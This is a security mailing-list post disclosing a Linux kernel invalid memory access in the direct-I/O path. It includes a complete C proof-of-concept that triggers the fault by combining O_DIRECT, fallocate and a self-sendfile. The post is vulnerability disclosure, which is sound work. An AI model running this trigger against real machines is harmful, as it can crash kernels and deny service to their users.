Date: Tue, 11 Oct 2016 22:22:48 +0800
From: Marco Grassi <marco.gra@...il.com>
To: oss-security@...ts.openwall.com
Cc: cve-assign@...re.org
Subject: linux kernel do_blockdev_direct_IO invalid memory access

Hello,

I posted this to ask feedback on security at kernel dot org, but I think my
mail got bounced back. Not sure if from the mailing list or from some
single recipient.

Anyway, reposting here:

The following program will cause an invalid memory access:

BUG: KASAN: wild-memory-access on address 0005080000000000

See this link for the full sanitizer report, stack trace and trigger PoC:

https://gist.github.com/marcograss/40850adb3c599ac38e0beac31617d56b

Tested on current master, with KASAN.

Marco

---

#define _GNU_SOURCE      /* must precede every include so fallocate() is declared */
#include <sys/syscall.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/sendfile.h>

int main(void)
{
  int ret = 0;
  /* 0x40 is O_CREAT on x86/x86_64: the file is created if it does not exist */
  int fd = open("./hurrdurr", O_APPEND|O_RDWR|0x40);
  /* fcntl cmd 4 is F_SETFL; 0x44000 is O_DIRECT|O_NOATIME on x86/x86_64 */
  ret = fcntl(fd, 4, 0x44000, 0, 0, 0);
  /* preallocate a few pages at an unaligned offset/length */
  ret = fallocate(fd, 0, 0x21, 0xafa6);
  off_t offset = 0;
  /* sendfile from the file into itself with O_DIRECT set: this enters the
     direct-I/O path named in the subject and triggers the KASAN report */
  ret = sendfile(fd, fd, &offset, 0x800);
  (void)ret;
  return 0;
}
